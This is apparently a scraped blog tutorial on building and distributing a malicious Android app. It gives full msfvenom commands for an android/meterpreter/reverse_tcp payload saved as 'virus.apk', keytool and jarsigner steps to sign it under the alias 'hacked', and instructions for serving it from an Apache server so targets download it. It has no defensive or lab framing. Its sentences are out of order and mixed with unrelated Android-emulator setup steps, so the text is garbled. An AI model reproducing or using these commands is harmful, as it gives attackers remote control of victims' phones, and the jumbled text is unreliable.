![]() ![]() In order to move the APK created by the script in “ /var/www/html”, we need root permissions. ![]() Now to download the APK on a target machine, we could use a server with Apache, from here we just need to go the correct url, which is something like “ 192.168.1.2/virus_signed.apk”. We need to sign a certificate because Android mobile devices are not allowed to install apps without the appropriately signed certificate. We set the parameter “ -y” to automatically answer with “yes” to the prompt in the terminal. We have to install two packages, default-jdk to use the jarsigner in order to sign and verify a Java Archive, zipalign which is an archive alignment tool that provides important optimization to Android application (.apk) files. We set the keystore file to generate, an alias like hacked but you can use what you want just keep in mind this alias when you are using the jarsigner command, the algorithm like RSA, the key size, the validity. The keytool command is a key and certificate management utility. With MSFvenom we set the payload, the host which is our IP, the port and the output as “ virus.apk”. A quick explanation about the commands used createThePayload.sh and hit enter to execute the script, check the output in the terminal to see if everything is correct. Run Terminal Emulator for Android on PC with LDPlayer Access your Androids built-in Linux command line shell. Jarsigner -verify -verbose -certs virus.apk Android-x86 is one of those pioneer Android emulators for Linux that aim to make it possible to run your Android emulation directly into your PC hardware. After wget, lzip, unzip, and squashfs-tools have been installed, go to Settings > Apps > Google Play Services > Permissions and enable all permissible permissions for both Google Play Store and Google Play Services. Jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore virus.apk hacked ![]() Keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000 sudo apt-get install default-jdk -y #!/bin/sh msfvenom -p android/meterpreter/reverse_tcp LHOST =YOURIP LPORT =YOURPORT -o virus.apk ![]()
0 Comments
Leave a Reply. |